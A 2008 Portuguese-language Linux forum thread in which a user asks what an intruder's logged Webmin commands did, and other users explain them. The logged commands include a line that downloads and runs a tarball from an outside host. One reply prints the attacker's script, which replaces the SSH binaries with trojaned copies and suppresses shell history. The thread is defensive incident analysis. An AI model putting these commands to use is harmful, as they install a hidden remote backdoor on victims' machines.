Provável invasão: O que esses comandos fazem?

carlittos
(usa Slackware)

Enviado em 17/07/2008 - 16:09h

Pessoal, acessaram uma das máquinas da rede, logaram no webmin como root e executaram os comando abaixo:

Sabem me dizer o que foi realizado nessa invasão?

echo -n BUFUWUZHERE;hostname
echo -n BUFUWUZHERE;hostname
echo -n BUFUWUZHERE;uname -a;id;uptime
echo -n BUFUWUZHERE;/etc/init.d/sshd restart
echo -n BUFUWUZHERE;cd /var/tmp;wget members.lycos.co.uk/velentax/back.tar;tar xzvf back.tar;rm -rf back.tar;cd back;chmod +x *;./inst
echo -n BUFUWUZHERE;/etc/init.d/ssh restart
echo -n BUFUWUZHERE;/etc/init.d/sshd restart
echo -n BUFUWUZHERE;/etc/init.d/sshd restart
echo -n BUFUWUZHERE;cd /var/tmp;ls
echo -n BUFUWUZHERE;cd /var/tmp;rm -rf back
echo -n BUFUWUZHERE;
echo -n BUFUWUZHERE;
echo -n BUFUWUZHERE;

engos
(usa openSUSE)

Enviado em 17/07/2008 - 16:19h

Desconsidere todos os:

echo -n BUFUWUZHERE;


Depois disso veja o que fica em cada linha e foi isso que foi executado, você pode ir fazendo esse passo a passo com cautela para verificar com precisão o que foi feito e recomendo que faça isso o quanto antes, caso seu esquema de particionamento esteja errado (sem o /tmp numa partição a parte e restrito para proibir a execução de programas mesmo como root).

vsmoraes
(usa Arch Linux)

Enviado em 17/07/2008 - 16:27h

1) echo -n BUFUWUZHERE;hostname
- R: Mostra "BUFUWUZHERE" escrito na tela e retorna o nome da máquina

2) echo -n BUFUWUZHERE;hostname
- R: Igual o 1)

3) echo -n BUFUWUZHERE;uname -a;id;uptime
- R: Mostra "BUFUWUZHERE" escrito na tela, retorna algumas confs da máquina (kernel, processador, etc) e retorna o tempo ligado.

3) echo -n BUFUWUZHERE;/etc/init.d/sshd restart
- R: Mostra "BUFUWUZHERE" escrito na tela e reinicia o serviço SSH

4) echo -n BUFUWUZHERE; cd /var/tmp;wget members.lycos.co.uk/velentax/back.tar;tar xzvf back.tar;rm -rf back.tar;cd back;chmod +x *;./inst
- R: Mostra "BUFUWUZHERE" escrito na tela, entra no diretorio /var/tmp, baixa um arquivo da internet, descompacta, da permissão de execução e executa

5) echo -n BUFUWUZHERE;/etc/init.d/ssh restart
- R: Mostra "BUFUWUZHERE" escrito na tela e reinicia o serviço de SSH

6) echo -n BUFUWUZHERE;/etc/init.d/sshd restart
- R: Igual ao 5

7) echo -n BUFUWUZHERE;/etc/init.d/sshd restart
- R: Igual ao 5

8) echo -n BUFUWUZHERE;cd /var/tmp;ls
- R: Mostra "BUFUWUZHERE" escrito na tela entra no diretório /var/tmp e lista seu conteúdo

9) echo -n BUFUWUZHERE;cd /var/tmp;rm -rf back
- R: Mostra "BUFUWUZHERE" escrito na tela, entra no diretório /var/tmp e remove o arquivo (ou pasta) back

10, 11 e 12) echo -n BUFUWUZHERE;
- R: Mostra "BUFUWUZHERE" escrito na tela

Conclusão: Verifique o que ele instalou na sua máquina e reveja suas confs de segurança.

carlittos
(usa Slackware)

Enviado em 17/07/2008 - 16:31h

Vejam que o cara q rodou os comandos, baixou um arquivo de http://members.lycos.co.uk/velentax/, acessei o site e contém vários arquivos crackeados, uma lista de senhas de root e até uma cópia dos arquivos do site do hsbc...
Se alguém com mais experiência puder examinar o arquivo back.tar q foi baixado desse site e puder falar o q pode ter feito, eu agradeço!
Obrigado a todos!

phelipe
(usa Arch Linux)

Enviado em 17/07/2008 - 16:57h

ele instalou um ssh backdoor, como você pode ver abaixo:

#!/bin/bash
unset HISTSAVE
unset HISTFILE
unset SAVEFILE
echo "++++ Starting.... ++++"
chattr -suia /usr/bin/ssh
chattr -suia /usr/bin/sftp
chattr -suia /usr/sbin/sshd
chattr -suia /usr/bin/scp
mkdir -p /etc/rpm
mv /usr/bin/ssh /etc/rpm
mv /usr/bin/sftp /etc/rpm
mv /usr/sbin/sshd /etc/rpm
mv /usr/bin/scp /etc/rpm
rm -rf /etc/ssh/sshd_config
rm -rf /etc/ssh/ssh_config
mv libcrypto.so.4 /lib/libcrypto.so.4
sleep 10
echo "[+] Installing SshD backdor..[+]"
mv ssh /usr/bin/ssh
mv sftp /usr/bin/sftp
mv sshd /usr/sbin/sshd
mv scp /usr/bin/scp
mv 1 /etc/ssh/sshd_config
mv 2 /etc/ssh/ssh_config
chattr +suia /usr/bin/ssh
chattr +suia /usr/bin/sftp
chattr +suia /usr/sbin/sshd
chattr +suia /usr/bin/scp

sleep 10

echo "Restart SshD deamon manualy "

Ele usou um exploit no seu webmin... a invasão partiu dai